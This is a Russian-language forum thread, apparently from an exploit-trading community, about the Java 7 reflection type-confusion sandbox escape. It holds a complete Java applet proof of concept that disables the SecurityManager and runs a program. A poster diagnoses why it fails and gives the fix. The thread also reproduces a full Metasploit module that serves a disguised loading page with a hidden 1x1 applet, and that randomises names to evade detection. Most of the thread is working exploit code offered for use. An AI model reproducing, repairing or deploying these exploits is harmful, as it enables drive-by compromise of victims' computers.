
Java Applet Reflection Type Confusion Remote Code

В общем сегодня всплыл очередной эксплоит под JRE:
https://dev.metasploit.com/redmine/projects...c2a38aa48029db3

первоисточник:
http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0

Код:
import java.lang.invoke.MethodHandle;
import java.lang.reflect.Field;
import static java.lang.invoke.MethodHandles.lookup;
import java.applet.Applet;

// Source half of the type-confusion pair: an int immediately followed by an
// Object reference. The field order and types are the whole point (the
// reflective copy in PoC.disableSecurityManager relies on this layout) — do
// not reorder or retype them.
class Union1 {
  int field1;
  Object field2;
}

// Destination half: same layout as Union1, but field2 is statically typed as
// SystemClass, so whatever reference lands there can be dereferenced through
// SystemClass.f1..f30 without any cast or runtime check.
class Union2 {
  int field1;
  SystemClass field2;
}

// Overlay type for the object that ends up in Union2.field2: thirty reference
// slots, of which the exploit only probes f29 and f30 looking for the
// SecurityManager reference (see PoC.disableSecurityManager). Which slot
// matches is JRE-build specific; keep the field count and order unchanged.
class SystemClass {
  Object f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f11,f12,
    f13,f14,f15,f16,f17,f18,f19,f20,f21,f22,f23,
    f24,f25,f26,f27,f28,f29,f30;
}

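/**
 * Proof of concept for the Java 7 reflection type confusion described by
 * Jeroen Frijters: it clears the SecurityManager reference held in
 * java.lang.System's statics and then spawns calc.exe.
 *
 * Needs Java 7 or later (java.lang.invoke) and a JRE on which
 * MethodHandles.Lookup.findStaticSetter still hands out a setter for a
 * static final field; the Metasploit module states 7u17 and earlier.
 *
 * The class is declared public on purpose: the browser plugin instantiates
 * the applet with Class.newInstance(), and for a package-private class
 * (modifiers "") that fails with
 * IllegalAccessException "can not access a member of class PoC with modifiers """
 * before init() ever runs — which is exactly the trace reported in this thread.
 */
public class PoC extends Applet {

    /** Stand-alone entry point; exercises the same path as the applet init(). */
    public static void main(String[] args) throws Throwable {
        new PoC().init();
    }

    /**
     * Applet entry point: disable the SecurityManager, then run calc.exe.
     * Any failure is only printed. (The original caught Exception and
     * Throwable separately with identical handlers; one handler is equivalent.)
     */
    public void init() {
        try {
            disableSecurityManager();
            Runtime.getRuntime().exec("calc.exe");
        } catch (Throwable t) {
            t.printStackTrace();
        }
    }

    /**
     * Nulls the SecurityManager by confusing an Object field with a SystemClass field.
     *
     * 1. Obtain setters for the static final Integer.TYPE and Double.TYPE fields
     *    (the weak access check is what makes this possible) and capture the real
     *    primitive classes first: int.class / double.class compile to reads of
     *    Integer.TYPE / Double.TYPE, so they must be saved before those statics
     *    are overwritten.
     * 2. Set Double.TYPE = int.class and Integer.TYPE = null, then copy
     *    Union1.field1 into Union2.field1 reflectively. With the TYPE constants
     *    swapped the reflective accessor for the int field is chosen as if the
     *    field were a double; per Frijters' write-up the copy is therefore wider
     *    than 4 bytes and drags the adjacent field2 (System.class) into
     *    Union2.field2, where it is now typed SystemClass without a cast.
     * 3. Restore Integer.TYPE / Double.TYPE.
     * 4. Probe f29 and f30 of the confused object for the slot that aliases
     *    System's SecurityManager and null it. The slot index is JRE/build
     *    specific; if neither matches, a message is printed and the manager is
     *    left in place (init() still attempts the exec).
     *
     * @throws Throwable propagated from invokeExact / reflection, e.g. on a JRE
     *         that refuses to create a setter for a final static field
     */
    static void disableSecurityManager() throws Throwable {
        MethodHandle setDoubleType = lookup().findStaticSetter(Double.class, "TYPE", Class.class);
        MethodHandle setIntegerType = lookup().findStaticSetter(Integer.class, "TYPE", Class.class);
        Field srcField = Union1.class.getDeclaredField("field1");
        Field dstField = Union2.class.getDeclaredField("field1");

        // Captured before the TYPE statics are clobbered (see step 1 above).
        Class classInt = int.class;
        Class classDouble = double.class;

        setDoubleType.invokeExact(int.class);
        setIntegerType.invokeExact((Class) null);

        Union1 u1 = new Union1();
        u1.field2 = System.class;
        Union2 u2 = new Union2();
        dstField.set(u2, srcField.get(u1));

        setDoubleType.invokeExact(classDouble);
        setIntegerType.invokeExact(classInt);

        if (u2.field2.f29 == System.getSecurityManager()) {
            u2.field2.f29 = null;
        } else if (u2.field2.f30 == System.getSecurityManager()) {
            u2.field2.f30 = null;
        } else {
            System.out.println("security manager field not found");
        }
    }
}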

замечу, что я его завести не смог, несмотря на модуль в метасплоите: на JRE 7u10 и 7u15 (WinXP SP3) у меня стабильно java.lang.reflect.InvocationTargetException ещё до инициализации апплета. Судя по вложенному IllegalAccessException («can not access a member of class PoC with modifiers ""»), причина в том, что класс PoC объявлен без модификатора public: плагин создаёт апплет через Class.newInstance(), а для пакетно-приватного класса (и его такого же конструктора) это запрещено. Достаточно объявить `public class PoC extends Applet`:

Код:
java.lang.reflect.InvocationTargetException
	at com.sun.deploy.util.DeployAWTUtil.invokeAndWait(Unknown Source)
	at sun.plugin2.applet.Plugin2Manager.runOnEDT(Unknown Source)
	at sun.plugin2.applet.Plugin2Manager.createApplet(Unknown Source)
	at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
	at java.lang.Thread.run(Unknown Source)
Caused by: java.lang.RuntimeException: java.lang.IllegalAccessException: Class sun.plugin2.applet.Plugin2Manager$12 can not access a member of class PoC with modifiers ""
	at sun.plugin2.applet.Plugin2Manager$12.run(Unknown Source)
	at java.awt.event.InvocationEvent.dispatch(Unknown Source)
	at java.awt.EventQueue.dispatchEventImpl(Unknown Source)
	at java.awt.EventQueue.access$200(Unknown Source)
	at java.awt.EventQueue$3.run(Unknown Source)
	at java.awt.EventQueue$3.run(Unknown Source)
	at java.security.AccessController.doPrivileged(Native Method)
	at java.security.ProtectionDomain$1.doIntersectionPrivilege(Unknown Source)
	at java.awt.EventQueue.dispatchEvent(Unknown Source)
	at java.awt.EventDispatchThread.pumpOneEventForFilters(Unknown Source)
	at java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source)
	at java.awt.EventDispatchThread.pumpEventsForHierarchy(Unknown Source)
	at java.awt.EventDispatchThread.pumpEvents(Unknown Source)
	at java.awt.EventDispatchThread.pumpEvents(Unknown Source)
	at java.awt.EventDispatchThread.run(Unknown Source)
Caused by: java.lang.IllegalAccessException: Class sun.plugin2.applet.Plugin2Manager$12 can not access a member of class PoC with modifiers ""
	at sun.reflect.Reflection.ensureMemberAccess(Unknown Source)
	at java.lang.Class.newInstance0(Unknown Source)
	at java.lang.Class.newInstance(Unknown Source)
	... 15 more
Exception: java.lang.reflect.InvocationTargetException
 
мм.. в метасплойте написано «7u17 и более ранние». С какой версии баг присутствует? Накрывает ли 6-ю ветку? (то есть, можно ли этим сплойтом заменить текущие два?)
 
тот же вариант в Метасплоите:
Код:
require 'msf/core'
require 'rex'
  
# Serves a page with a 1x1 unsigned applet whose JAR carries the framework's
# Java payload plus the four precompiled exploit classes (Exploit, Union1,
# Union2, SystemClass from data/exploits/jre7u17). Click-to-play is not
# bypassed, so the target must accept the Java warning for the applet to run.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize(info = {})
    # The three native targets differ only in label and platform; the Java
    # payload target stays first so it remains the default (index 0).
    native_targets = [['Windows x86', 'win'], ['Mac OS X x86', 'osx'], ['Linux x86', 'linux']].map do |label, platform|
      [ "#{label} (Native Payload)", { 'Platform' => platform, 'Arch' => ARCH_X86 } ]
    end

    super(update_info(info,
      'Name'           => 'Java Applet Reflection Type Confusion Remote Code Execution',
      'Description'    => %q{
          This module abuses Java Reflection to generate a Type Confusion, due to a weak
        access control when setting final fields on static classes, and run code outside of
        the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This
        exploit doesn't bypass click-to-play, so the user must accept the java warning in
        order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Jeroen Frijters', # Vulnerability discovery and PoC
        'juan vazquez'     # Metasploit module
      ],
      'References'     => [
        [ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ],
        [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html' ]
      ],
      'Platform'       => [ 'java', 'win', 'osx', 'linux' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        => [[ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA } ]] + native_targets,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 10 2013'
    ))
  end

  # Load the precompiled applet classes once and give the entry class a random
  # name. The replacement has the same length as "Exploit" so the byte-level
  # substitution keeps the class file parseable (constant-pool strings are
  # length-prefixed). Union1/Union2/SystemClass keep their names because the
  # entry class references them by name.
  def setup
    @exploit_class = read_class_file("Exploit")
    @union1_class  = read_class_file("Union1")
    @union2_class  = read_class_file("Union2")
    @system_class  = read_class_file("SystemClass")

    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    super
  end

  # Routes: *.jar -> the applet JAR, a trailing-slash URI -> the loader page,
  # anything else -> redirect to the resource root.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      unless regenerate_payload(cli)
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Minimal page embedding the applet; the archive name is random per request,
  # the code attribute is the randomized entry class chosen in setup.
  def generate_html
    [
      %Q|<html><head><title>Loading, Please Wait...</title></head>|,
      %Q|<body><center><p>Loading, Please Wait...</p></center>|,
      %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|,
      %Q|</applet></body></html>|
    ].join
  end

  private

  # Raw bytes of data/exploits/jre7u17/<name>.class from the framework install.
  def read_class_file(name)
    File.binread(File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "#{name}.class"))
  end

  # Assemble the applet JAR: the framework's Java payload plus the four exploit
  # classes, with the "metasploit" / "Payload" markers in entry names and bytes
  # replaced by same-length random strings (the "Payload" replacement is sized
  # from "payload", which has the same length).
  def build_jar
    jar = payload.encoded_jar
    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file("Union1.class", @union1_class)
    jar.add_file("Union2.class", @union2_class)
    jar.add_file("SystemClass.class", @system_class)

    substitutions = {
      "metasploit" => rand_text_alpha("metasploit".length),
      "Payload"    => rand_text_alpha("payload".length)
    }
    jar.entries.each do |entry|
      substitutions.each do |marker, replacement|
        entry.name.gsub!(marker, replacement)
        entry.data = entry.data.gsub(marker, replacement)
      end
    end
    jar.build_manifest
    jar
  end

end
 

